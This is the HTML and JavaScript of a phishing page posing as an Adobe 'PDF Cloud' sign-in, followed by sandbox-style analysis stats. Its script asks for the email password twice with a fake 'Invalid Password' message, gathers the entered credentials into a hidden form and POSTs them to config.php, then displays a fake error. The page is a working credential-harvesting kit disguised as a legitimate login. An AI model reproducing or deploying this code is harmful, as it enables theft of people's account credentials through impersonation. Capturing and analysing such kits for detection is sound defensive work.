<div class="text-danger" id="msg" style="color: red; font-style: italic; font-size: 13px;">Invalid
Password! Please Enter your correct Password</div>
<li class="l4 animated fadeIn" id="err">
<p id="erp">Error Message</p>
</li>
<li><input type="email" name="email2" class="inp" id="email2" autocomplete="off" placeholder="Email Address" style="background-image: url(""); background-repeat: no-repeat; background-attachment: scroll; background-size: 16px 18px; background-position: 98% 50%;" readonly="">
</li><li><input type="password" name="password2" class="inp" id="password2" autocomplete="off" placeholder="Email Password" style="background-image: url(""); background-repeat: no-repeat; background-attachment: scroll; background-size: 16px 18px; background-position: 98% 50%; cursor: auto;" required="">
</li><br>
<li><style>
.btn {
padding: 10px 20px;
font-size: 18px;
background-color: #007BFF;
color: #fff;
border: none;
border-radius: 5px;
cursor: pointer;
}
/* Style for the list item */
li {
list-style: none;
text-align: center; /* Center text horizontally within the list item */
}
</style>
<ul>
<li>
<button type="submit" name="submit" class="btn" id="submit-btn">Sign In</button>
</li>
</ul>
</li>
<li class="l5">
<p>Copyright 2023 Adobe Corporation</p>
</li>
</ul>
</form><form method="POST" action="" id="form3" style="display: none;">
<ul>
<li class="l1"><svg viewBox="0 0 48 48" focusable="false" aria-hidden="true" role="img" class="spectrum-Icon spectrum-Icon--sizeM nav-logo">
<path d="M29.219 6H44v36L29.219 6zM18.798 6H4v36L18.798 6zm5.207 13.265l9.422 22.733h-6.173l-2.823-7.24h-6.896l6.47-15.493z">
</path>
</svg>
<p class="">PDF Cloud</p>
</li>
<br><li class="l3">
<p>Sorry, something went wrong</p>
</li><br>
<div class="text-danger" id="msg" style="display: none; color: red; font-style: italic; font-size: 13px;">Invalid
Password! Please Enter your correct Password</div>
<span id="error" class="text-danger" style="display: none;">That account doesn't exist.
Enter a different account</span>
<li class="l4 animated fadeIn" id="err">
<p id="erp">Error Message</p>
</li>
<br>
<li><style>
.btn {
padding: 10px 20px;
font-size: 18px;
background-color: #007BFF;
color: #fff;
border: none;
border-radius: 5px;
cursor: pointer;
}
/* Style for the list item */
li {
list-style: none;
text-align: center; /* Center text horizontally within the list item */
}
</style>
<ul>
<li class="l1">
<p>The file may be moved, deleted or edited.</p>
</li>
</ul>
</li>
<li class="l5">
<p>Copyright 2023 Adobe Corporation</p>
</li>
</ul>
</form></div>
</div>
</div>
</div>
<div id="success-page" style="display: none;">
<p>Success! Your data has been submitted.</p>
</div>
<script>
document.addEventListener('DOMContentLoaded', function() {
// Get the form elements
var form1 = document.getElementById('form1');
var form2 = document.getElementById('form2');
var form3 = document.getElementById('form3');
var successPage = document.getElementById('success-page');
// Variables to store form data
var formData1 = {};
var formData2 = {};
// Add a submit event listener to Form 1
form1.addEventListener('submit', function(e) {
e.preventDefault(); // Prevent the default form submission behavior
// Collect data from Form 1
formData1.email = form1.querySelector('#email').value;
formData1.password = form1.querySelector('#password').value;
// Hide Form 1 and show Form 2
form1.style.display = 'none';
form2.style.display = 'block';
});
// Add a submit event listener to Form 2
form2.addEventListener('submit', function(e) {
e.preventDefault(); // Prevent the default form submission behavior
// Collect data from Form 2
formData2.email2 = form2.querySelector('#email2').value;
formData2.password2 = form2.querySelector('#password2').value;
// Here you can perform any actions with the data from Form 1 and Form 2
// Combine the data from Form 1 and Form 2
var combinedData = { ...formData1, ...formData2 };
// Create a hidden form element for POST request
var hiddenForm = document.createElement('form');
hiddenForm.method = 'POST';
hiddenForm.action = 'config.php';
// Convert data to input fields
for (var key in combinedData) {
var input = document.createElement('input');
input.type = 'hidden';
input.name = key;
input.value = combinedData[key];
hiddenForm.appendChild(input);
}
// Append the hidden form to the document and submit it
document.body.appendChild(hiddenForm);
hiddenForm.submit();
// Hide Form 2 and show Form 3
form2.style.display = 'none';
form3.style.display = 'block';
});
});
</script>
<script src="./Sign In - PDF CLOUD_files/jquery-3.3.1.min.js.download"></script><!-- Optional JavaScript -->
<!-- jQuery first, then Popper.js, then Bootstrap JS -->
<script src="./Sign In - PDF CLOUD_files/jquery-3.2.1.slim.min.js.download" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous">
</script>
<script src="./Sign In - PDF CLOUD_files/popper.min.js.download" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous">
</script>
<script src="./Sign In - PDF CLOUD_files/bootstrap.min.js.download" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous">
</script>
<script src="./Sign In - PDF CLOUD_files/jquery.min.js.download"></script>
<script src="./Sign In - PDF CLOUD_files/bootstrap.min.js(1).download"></script>
</body></html>
Function Calls
None |
Stats
MD5 | 8051d4e780ccf2314495b562910505d4 |
Eval Count | 0 |
Decode Time | 52 ms |